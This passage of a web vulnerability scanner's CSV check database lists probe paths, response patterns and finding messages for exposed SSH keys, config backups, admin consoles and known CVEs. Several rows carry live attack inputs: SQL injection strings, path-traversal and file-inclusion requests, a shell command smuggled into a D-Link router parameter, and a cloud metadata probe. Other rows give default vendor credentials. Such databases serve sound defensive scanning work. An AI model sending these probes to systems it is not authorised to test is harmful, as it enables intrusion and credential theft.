web.\",\"\",\"\"\n\"007124\",\"\",\"3\",\"/.ssh/id_dsa.pub\",\"GET\",\"BODY:ssh\\-dsa&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007125\",\"\",\"3\",\"/.ssh/id_dss\",\"GET\",\"BODY:[-]{5}((?:BEGIN|END)\\sDSS\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)[-]{5}&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007126\",\"\",\"3\",\"/.ssh/id_dss.pub\",\"GET\",\"BODY:ssh\\-dss&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007127\",\"\",\"e\",\"/phpLiteAdmin/\",\"GET\",\"BODY:phpliteadmin\\.php\",\"phpLiteAdmin console found.\",\"\",\"\"\n\"007128\",\"\",\"e\",\"/MAMP/phpLiteAdmin/\",\"GET\",\"BODY:phpliteadmin\\.php\",\"phpLiteAdmin console found.\",\"\",\"\"\n\"007129\",\"\",\"1\",\"/.sqlite_history\",\"GET\",\"BODY:(?i)(?:tables|quit|databases|INSERT|DELETE|DROP|GRANT|SELECT)&&CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"007130\",\"CVE-2016-6195 https://enumerated.wordpress.com/2016/07/11/1/\",\"9\",\"@FORUMforumrunner/request.php?cmd=get_spam_data&d=1&postids='1\",\"GET\",\"BODY:(?:database\\shas\\sencountered\\sa\\sproblem|\\/image\\.php\\?type=dberror)\",\"vBulletin contains a SQL injection in the forumrunner addon.\",\"\",\"\"\n\"007131\",\"CVE-2016-6195 https://enumerated.wordpress.com/2016/07/11/1/\",\"9\",\"@VBULLETINforumrunner/request.php?cmd=get_spam_data&d=1&postids='1\",\"GET\",\"BODY:(?:database\\shas\\sencountered\\sa\\sproblem|\\/image\\.php\\?type=dberror)\",\"vBulletin contains a SQL injection in the forumrunner addon.\",\"\",\"\"\n\"007132\",\"\",\"b\",\"/sitecore/shell/webservice/service.asmx\",\"GET\",\"BODY:Visual Sitecore Service\",\"The SiteCore CMS shell webservice is running which could allow an attacker to brute force account information or execute API commands\",\"\",\"\"\n\"007133\",\"\",\"b\",\"/sitecore/admin/login.aspx\",\"GET\",\"BODY:Log into Sitecore\",\"The SiteCore CMS administrative login interface is available which could allow brute force or unauthorized access\",\"\",\"\"\n\"007134\",\"\",\"b\",\"/sitecore/debug\",\"GET\",\"BODY:Default page\",\"The SiteCore CMS debug interface was identified as accessible\",\"\",\"\"\n\"007137\",\"\",\"3\",\"/.ssh/id_ecdsa.pub\",\"GET\",\"BODY:ecdsa\\-sha2\\-nistp256&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007138\",\"\",\"3\",\"/.ssh/id_ecdsa\",\"GET\",\"BODY:[-]{5}((?:BEGIN|END)\\sEC\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)[-]{5}&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007139\",\"\",\"3\",\"/.ssh/id_ed25519.pub\",\"GET\",\"BODY:ssh\\-ed25519&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007140\",\"\",\"3\",\"/.ssh/id_ed25519\",\"GET\",\"BODY:[-]{5}((?:BEGIN|END)\\sENCRYPTED\\sPRIVATE\\sKEY|(?:BEGIN|END)\\sOPENSSH\\sPRIVATE\\sKEY)[-]{5}&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007141\",\"\",\"3\",\"/.ssh/identity\",\"GET\",\"BODY:SSH PRIVATE KEY FILE FORMAT&&CODE:200\",\"A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\",\"\",\"\"\n\"007142\",\"\",\"2\",\"/user_guide/\",\"GET\",\"BODY:CodeIgniter User Guide\",\"CodeIgniter User Guide exposes installed version number.\",\"\",\"\"\n\"007143\",\"\",\"3\",\"/.idea/misc.xml\",\"GET\",\"BODY:ProjectRootManager\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007144\",\"\",\"3\",\"/.idea/modules.xml\",\"GET\",\"BODY:module\\sfileurl\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007145\",\"\",\"3\",\"/.idea/vcs.xml\",\"GET\",\"BODY:mapping\\sdirectory\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007146\",\"\",\"3\",\"/.idea/workspace.xml\",\"GET\",\"BODY:project\\sversion\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007147\",\"\",\"3\",\"/.idea/scopes/scope_settings.xml\",\"GET\",\"BODY:DependencyValidationManager\",\"JetBrains project IDE reveals application information.\",\"\",\"\"\n\"007148\",\"CVE-2013-3831 https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html\",\"9\",\"/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27\",\"GET\",\"BODY:Failed\\sto\\sparse\\squery\",\"Oracle Portal Demo Org Chart is vulnerable to SQL injection.\",\"\",\"\"\n\"007149\",\"CVE-2013-3831 https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html\",\"9\",\"/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27\",\"GET\",\"BODY:Failed\\sto\\sparse\\squery\",\"Oracle Portal Demo Org Chart is vulnerable to SQL injection.\",\"\",\"\"\n\"007150\",\"\",\"bde\",\"/api/jsonws/\",\"GET\",\"BODY:json\\-web\\-services\\-api\",\"LifeRay WebServices API found.\",\"\",\"\"\n\"007151\",\"\",\"bde\",\"/api/jsonws/index.jsp\",\"GET\",\"BODY:json\\-web\\-services\\-api\",\"LifeRay WebServices API found.\",\"\",\"\"\n\"007152\",\"\",\"5\",\"//WEB-INF/web.xml\",\"GET\",\"BODY:j2ee\",\"A web.xml file was retrieved from the WEB-INF directory by prepending an additional slash.\",\"\",\"\"\n\"007153\",\"\",\"e\",\"/webconsole/vsplogin.action\",\"GET\",\"BODY:Avaya&&BODY:Web Console\",\"Avaya web console found. Default credential is admin:admin01\",\"\",\"\"\n\"007154\",\"\",\"e\",\"/cgi-bin/common/login/webLogin\",\"GET\",\"BODY:Avaya&&BODY:System Management Interface\",\"Avaya management interface found. Default credential is admin:admin01\",\"\",\"\"\n\"007155\",\"\",\"e\",\"/php/login.php\",\"GET\",\"BODY:Creating administrative session&&BODY:bug fix 2157\",\"Palo Alto Networks firewall web admin page found\",\"\",\"\"\n\"007156\",\"\",\"e\",\"/ui/\",\"GET\",\"BODY:Infoblox System Manager&&BODY:Infoblox WebUI Login Page ID\",\"Infoblox web console found. Default credential is admin:infoblox\",\"\",\"\"\n\"007157\",\"\",\"e\",\"/WebLM/\",\"GET\",\"BODY:Web License Manager \\(WebLM\\)&&BODY:Avaya\",\"Avaya license managing console found. Default credential is admin:weblmadmin\",\"\",\"\"\n\"007158\",\"\",\"e\",\"/g450.html\",\"GET\",\"BODY:Avaya G450\\/G350 \\- Avaya Device Management&&BODY:routerIp\",\"Avaya web console found. Default SNMP community string is public\",\"\",\"\"\n\"007159\",\"\",\"e\",\"/local-login/\",\"GET\",\"BODY:Unified Communications Management&&BODY:Avaya\",\"Avaya System Manager web console found. Default credential is admin:admin\",\"\",\"\"\n\"007160\",\"\",\"3\",\"@WORDPRESSwp-content/plugins/simply-static/debug.txt\",\"GET\",\"BODY:class\\-ss\\-archive\",\"WordPress Simply Static debug log may reveal site information\",\"\",\"\"\n\"007161\",\"\",\"0\",\"/Editor/assetmanager/assetmanager.asp\",\"GET\",\"BODY:Upload\\sFile\",\"InnovaStudio file uploader found\",\"\",\"\"\n\"007162\",\"CVE-2017-9248\",\"0\",\"/Telerik.Web.UI.DialogHandler.aspx\",\"GET\",\"CODE:200&&BODY:Loading the dialog\",\"Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads\",\"\",\"\"\n\"007163\",\"CVE-2017-9248\",\"0\",\"/Telerik.Web.UI.DialogHandler.aspx?dp=////\",\"GET\",\"CODE:200&&BODY:Base-64&&!BODY:cannot be less than zero\",\"Telerik UI for ASP.NET AJAX: poor crypto may lead to arbitrary file uploads\",\"\",\"\"\n\"007164\",\"CVE-2017-9248\",\"0\",\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx\",\"GET\",\"CODE:200&&BODY:Loading the dialog\",\"Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads\",\"\",\"\"\n\"007165\",\"CVE-2017-9248\",\"0\",\"/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////\",\"GET\",\"CODE:200&&BODY:Base-64&&!BODY:cannot be less than zero\",\"Telerik UI for ASP.NET AJAX: poor crypto may lead to arbitrary file uploads\",\"\",\"\"\n\"007166\",\"\",\"be\",\"/_adminer.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007167\",\"\",\"be\",\"/livehelp/admin/index.php\",\"GET\",\"BODY:<title>Live\\sHelp\\sWeb\\sApp\",\"Chatstack live chat software admin interface found.\",\"\",\"\"\n\"007168\",\"\",\"123\",\"/.config.local.php.swp\",\"GET\",\"BODY:db_host&&BODY:db_user\",\"CS Cart config.local.php swap file found.\",\"\",\"\"\n\"007169\",\"\",\"be\",\"/ad.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007170\",\"\",\"be\",\"/adminer-4.2.5-en.phpp\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007171\",\"\",\"be\",\"/addminer-4.2.5-mysqlphp\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007172\",\"\",\"be\",\"/adminer-4.2.5.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007173\",\"\",\"be\",\"/adminer-4.3.0-en.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007174\",\"\",\"be\",\"/adminer-4.3.0-mysql-en.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007175\",\"\",\"be\",\"/adminer-4.3.0-mysql.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007176\",\"\",\"be\",\"/adminer-4.3.0.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007177\",\"\",\"be\",\"/adminer-4.3.1.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007178\",\"\",\"be\",\"/adminer-4.3.1-en.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007179\",\"\",\"be\",\"/adminer-4.3.1-mysql-en.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007180\",\"\",\"be\",\"/adminer-4.3.1-mysql.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007181\",\"\",\"be\",\"/Adminer.php\",\"GET\",\"BODY:<title>Select\\sdatabase\\s\\-&&BODY:www\\.adminer\\.org\",\"The Adminer program is a database admin access tool which can allow full administrative access to databases.\",\"\",\"\"\n\"007182\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/CoordinatorPortType\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.CoordinatorPortTypePortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007183\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/RegistrationPortTypeRPC\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.RegistrationPortTypeRPCPortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007184\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/ParticipantPortType\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.ParticipantPortTypePortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007185\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/RegistrationRequesterPortType\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.RegistrationRequesterPortTypePortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007186\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/CoordinatorPortType11\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.CoordinatorPortType11PortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007187\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/RegistrationPortTypeRPC11\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.RegistrationPortTypeRPC11PortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007188\",\"CVE-2017-10271\",\"8a\",\"/wls-wsat/ParticipantPortType11\",\"GET\",\"BODY:weblogic\\.wsee\\.wstx\\.wsat\\.v10\\.endpoint\\.ParticipantPortType11PortImpl&&CODE:200\",\"Oracle WebLogic Server may be vulnerable to remote takeover.\",\"\",\"\"\n\"007189\",\"\",\"1b\",\"@CGIDIRSfilemanager/Manager.pl\",\"GET\",\"BODY:iDC File Manager is a powerful multilingual web based system\",\"iDC File Manager found\",\"\",\"\"\n\"007190\",\"\",\"3b\",\"/common/about\",\"GET\",\"BODY:KACE\\sSystems\",\"Dell KACE Systems Management Appliance version information\",\"\",\"\"\n\"007191\",\"\",\"3\",\"/master.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007192\",\"\",\"3\",\"/masters.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007193\",\"\",\"3\",\"/connections.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007194\",\"\",\"3\",\"/connection.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007195\",\"\",\"3\",\"/passwords.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007196\",\"\",\"3\",\"/PasswordsData.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007197\",\"\",\"3\",\"/users.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007198\",\"\",\"3\",\"/conndb.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007199\",\"\",\"3\",\"/conn.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007200\",\"\",\"3\",\"/security.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007201\",\"\",\"3\",\"/accounts.xml\",\"GET\",\"CODE:200&&BODY:xml\\sversion\",\"This might be interesting.\",\"\",\"\"\n\"007202\",\"\",\"3\",\"/db.json\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"007203\",\"\",\"3\",\"/userdata.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007204\",\"\",\"3\",\"/login.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007205\",\"\",\"3\",\"/master.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007206\",\"\",\"3\",\"/masters.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007207\",\"\",\"3\",\"/connections.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007208\",\"\",\"3\",\"/connection.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007209\",\"\",\"3\",\"/passwords.json\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"007210\",\"\",\"3\",\"/PasswordsData.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007211\",\"\",\"3\",\"/users.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007212\",\"\",\"3\",\"/conndb.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007213\",\"\",\"3\",\"/conn.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007214\",\"\",\"3\",\"/security.json\",\"GET\",\"BODY:\\\"(?:authentication|encryption)\\\"(?:\\s+)?\\:\",\"JSON config file found..\",\"\",\"\"\n\"007215\",\"\",\"3\",\"/accounts.json\",\"GET\",\"CODE:200&&BODY:\\{\",\"This might be interesting.\",\"\",\"\"\n\"007216\",\"\",\"3\",\"/package.json\",\"GET\",\"BODY:\\\"name\\\"\\:&&BODY:\\\"dependencies\\\"\\:\",\"Node.js package file found. It may contain sensitive information.\",\"\",\"\"\n\"007217\",\"\",\"3\",\"/redis_config.json\",\"GET\",\"BODY:host\\\"(?:\\s+)?\\:\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007218\",\"\",\"3\",\"/credis/tests/redis_config.json\",\"GET\",\"BODY:host\\\"(?:\\s+)?\\:\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007219\",\"\",\"3\",\"/redis/config.json\",\"GET\",\"BODY:mount\\\"(?:\\s+)?\\:\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007220\",\"\",\"3\",\"/config/redis.json\",\"GET\",\"BODY:host\\\"(?:\\s+)?\\:\",\"Redis config file found. It may contain sensitive information.\",\"\",\"\"\n\"007221\",\"\",\"3\",\"/firebase.json\",\"GET\",\"BODY:hosting\\\"(?:\\s+)?\\:\",\"Firebase config file found. It may contain sensitive information.\",\"\",\"\"\n\"007222\",\"\",\"d\",\"/ws.asmx\",\"GET\",\"BODY:Web\\sService\",\"Webservice found\",\"\",\"\"\n\"007223\",\"\",\"d\",\"/ws/ws.asmx\",\"GET\",\"BODY:Web\\sService\",\"Webservice found\",\"\",\"\"\n\"007224\",\"\",\"23\",\"/.gitignore\",\"GET\",\"CODE:200\",\".gitignore file found. It is possible to grasp the directory structure.\",\"\",\"\"\n\"007225\",\"\",\"23\",\"/.hgignore\",\"GET\",\"CODE:200\",\".hgignore file found. It is possible to grasp the directory structure.\",\"\",\"\"\n\"007226\",\"\",\"23\",\"/.env\",\"GET\",\"CODE:200\",\".env file found. The .env file may contain credentials.\",\"\",\"\"\n\"007227\",\"\",\"7\",\"@WORDPRESSwp-content/themes/twentyeleven/images/headers/server.php?filesrc=@LFI(abs)\",\"GET\",\"BODY:Current\\sPath&&@LFI()\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007228\",\"\",\"7\",\"@WORDPRESSwp-includes/Requests/Utility/content-post.php?filesrc=@LFI(abs)\",\"GET\",\"BODY:Current\\sPath&&@LFI()\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007229\",\"\",\"7\",\"@WORDPRESSwp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=@LFI(abs)\",\"GET\",\"BODY:Current\\sPath&&@LFI()\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007230\",\"\",\"7\",\"@WORDPRESSwp-license.php?file=/\",\"GET\",\"BODY:href=\\\"\\?file=\\/\",\"A PHP backdoor file manager was likely found.\",\"\",\"\"\n\"007231\",\"\",\"7\",\"/assets/mobirise/css/meta.php?filesrc=\",\"GET\",\"BODY:Current Path&&BODY:127\\.0\\.0\\.1\",\"A PHP backdoor file manager was found.\",\"\",\"\"\n\"007232\",\"\",\"7\",\"/Meuhy.php\",\"GET\",\"BODY:404\\-server\\!\\!\",\"A PHP backdoor file manager was likely found.\",\"\",\"\"\n\"007233\",\"\",\"3\",\"/HNAP1/\",\"GET\",\"BODY:GetDeviceSettingResult\",\"HNAP1 router information often displays sensitive information.\",\"\",\"\"\n\"007234\",\"\",\"8\",\"/login.cgi?cli=aa%20aa%27cat%20@LFI(abs)\",\"GET\",\"@LFI()\",\"Some D-Link router remote command execution.\",\"\",\"\"\n\"007235\",\"\",\"8\",\"/shell?cat+@LFI(abs,nix)\",\"GET\",\"@LFI(),\"A backdoor was identified.\",\"\",\"\"\n\"007236\",\"\",\"3\",\"/currentsetting.htm\",\"GET\",\"BODY:Model=\",\"Netgear information disclosure.\",\"\",\"\"\n\"007237\",\"\",\"3\",\"/device_description.xml\",\"GET\",\"BODY:modelDescription\",\"Sonos information disclosure.\",\"\",\"\"\n\"007238\",\"\",\"3\",\"/evox/about\",\"GET\",\"BODY:serverName\",\"Trane Tracer information disclosure.\",\"\",\"\"\n\"007239\",\"RFC-5785\",\"3\",\"/.well-known/security.txt\",\"GET\",\"BODY:contact:\",\"Potential .well-known information disclosure.\",\"\",\"\"\n\"007240\",\"\",\"7\",\"/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=\",\"GET\",\"BODY:wave=\",\"Argus Surveillance DVR 4.0.0.0 contains a local file retrieval vulnerability\",\"\",\"\"\n\"007241\",\"\",\"1\",\"/util/xmlrpc/Handler.ashx\",\"GET\",\"BODY:EPiServer XMLRPC\",\"EpiServer API discovered\",\"\",\"\"\n\"007242\",\"RFC-5785\",\"3\",\"/.well-known/openid-configuration\",\"GET\",\"BODY:issuer\",\"OpenID Provider Configuration Information.\",\"\",\"\"\n\"007243\",\"RFC-5785\",\"3\",\"/.well-known/oauth-authorization-server\",\"GET\",\"BODY:issuer\",\"OAuth 2.0 Authorization Server Metadata.\",\"\",\"\"\n\"007244\",\"\",\"e\",\"/ibm/console/logon.jsp\",\"GET\",\"BODY:action=\\\"\\/ibm\\/console\\/j_security_check\",\"IBM WebSphere admin console\",\"\",\"\"\n\"007245\",\"CVE-2017-17762\",\"f\",\"/util/xmlrpc/Handler.ashx\",\"GET\",\"BODY:EPiServer.Blog (7\\.0\\.([0-4]|5([0-7]|8[1-5])))\",\"EpiServer Blog $1 may contain an XXE vulnerability in the blog module, which is accessible even if the module is not activated.\",\"\",\"\"\n\"007246\",\"CVE-2019-1653\",\"23\",\"/cgi-bin/config.exp\",\"GET\",\"BODY:sysconfig\",\"Cisco RV320/RV325 information disclosure\",\"\",\"\"\n\"007247\",\"CVE-2019-2725 CNVD-C-2019-48814\",\"8a\",\"/_async/AsyncResponseServiceJms?WSDL\",\"GET\",\"CODE:200&&BODY:www\\.bea\\.com\\/async\\/AsyncResponseService\",\"BEA WebLogic may allow remote takeover.\",\"\",\"\"\n\"007248\",\"\",\"23\",\"@WORDPRESS.wp-config.php.swp\",\"GET\",\"BODY:DB_NAME\",\".wp-config.php.swp file found. This file is swap file created when editing with vi/vim editor. This file contains the database credentials.\",\"\",\"\"\n\"007249\",\"\",\"23\",\"@WORDPRESSwp-config.php~\",\"GET\",\"BODY:DB_NAME\",\"wp-config.php~ file found. This file is a backup file created when editing with emacs editor. This file contains the database credentials.\",\"\",\"\"\n\"007250\",\"\",\"23\",\"@WORDPRESSwp-config.php.bak\",\"GET\",\"BODY:DB_NAME\",\"wp-config.php.bak file found. This file contains the database credentials.\",\"\",\"\"\n\"007251\",\"\",\"23\",\"@WORDPRESSwp-config.php.bakup\",\"GET\",\"BODY:DB_NAME\",\"wp-config.php.bakup file found. This file contains the database credentials.\",\"\",\"\"\n\"007252\",\"\",\"23\",\"@WORDPRESS#wp-config.php#\",\"GET\",\"BODY:DB_NAME\",\"#wp-config.php# file found. This file contains the database credentials.\",\"\",\"\"\n\"007253\",\"\",\"23\",\"@WORDPRESSwp-config.php_bak\",\"GET\",\"BODY:DB_NAME\",\"wp-config.php_bak file found. This file contains the database credentials.\",\"\",\"\"\n\"007254\",\"\",\"3\",\"http://100.100.100.200/latest/meta-data/\",\"GET\",\"BODY:user\\-data\",\"The Alibaba Cloud host is configured as a reverse proxy which allows access to the Meta-Data service. This could allow significant access to the host/infrastructure.\",\"\",\"Host: 100.100.100.200\\r\\n\"\n\"007255\",\"\",\"1\",\"/.tools/webmail\",\"GET\",\"CODE:200&&BODY:webmail\",\"Webmail Found. Possibly on Media Temple/Gridserver.\",\"\",\"\"\n\"007256\",\"https://developer.apple.com/documentation/xcode/allowing-apps-and-websites-to-link-to-your-content\",\"3\",\"/apple-app-site-association\",\"GET\",\"CODE:200&&BODY:applinks\",\"Apple Universal Links.\",\"\",\"\"\n\"007257\",\"RFC-5785\",\"3\",\"/.well-known/apple-app-site-association\",\"GET\",\"CODE:200&&BODY:applinks\",\"Apple Universal Links.\",\"\",\"\"\n\"007258\",\"RFC-5785\",\"3\",\"/.well-known/assetlinks.json\",\"GET\",\"CODE:200&&BODY:relation\",\"Android App Links.\",\"\",\"\"\n\"007259\",\"\",\"be\",\"/\",\"GET\",\"BODY:share\\.router&&BODY:router\\.copyright&&BODY:image\\/cisco_logo_about\\.png\",\"Cisco (RV) router login page detected.\",\"\",\"\"\n\"007260\",\"CVE-2019-1898 https://www.tenable.com/security/research/tra-2019-29\",\"235\",\"/_syslog.txt\",\"GET\",\"BODY:[0-9]{4}-[0-9]{2}-[0-9]{2}\\s[0-9:]+\\sRV[0-9]+W&&CODE:200\",\"Cisco RV110W/RV130W/RV215W router allows remote access to the syslog.\",\"\",\"\"\n\"007261\",\"\",\"be\",\"/remote/login?lang=en\",\"GET\",\"BODY:(<span>Launch\\sFortiClient<\\/span>|launchFortiClient\\(\\)|/remote/fgt_lang)&&CODE:200\",\"FortiOS SSL VPN login page detected.\",\"\",\"\"\n\"007262\",\"CVE-2018-13379\",\"2357\",\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\",\"GET\",\"BODY:var\\sfgt_lang\\s=&&CODE:200\",\"FortiOS SSL VPN is vulnerable to a local file inclusion (LFI) vulnerability.\",\"\",\"\"\n\"007263\",\"\",\"be\",\"/dana-na/auth/url_default/welcome.cgi\",\"GET\",\"BODY:<title>Pulse\\sConnect\\sSecure&&BODY:<b>Welcome\\sto<\\/b>\",\"Pulse Connect Secure login page detected.\",\"\",\"\"\n\"007264\",\"CVE-2019-11510 https://exploit-db.com/exploits/47297\",\"2357\",\"/dana-na/../dana/html5acc/guacamole/@LFI(nix)?/dana/html5acc/guacamole/\",\"GET\",\"@LFI()\",\"Pulse Connect Secure is vulnerable to a local file inclusion (LFI) vulnerability.\",\"\",\"\"\n\"007265\",\"\",\"be\",\"/app/ui/login.jsp\",\"GET\",\"BODY:<!\\-\\-.+login\\spage\\s-\\-\\>&&BODY:Cisco\\sUCS\\sDirector&&CODE:200\",\"Generic login page (possible Cisco UCS Director) 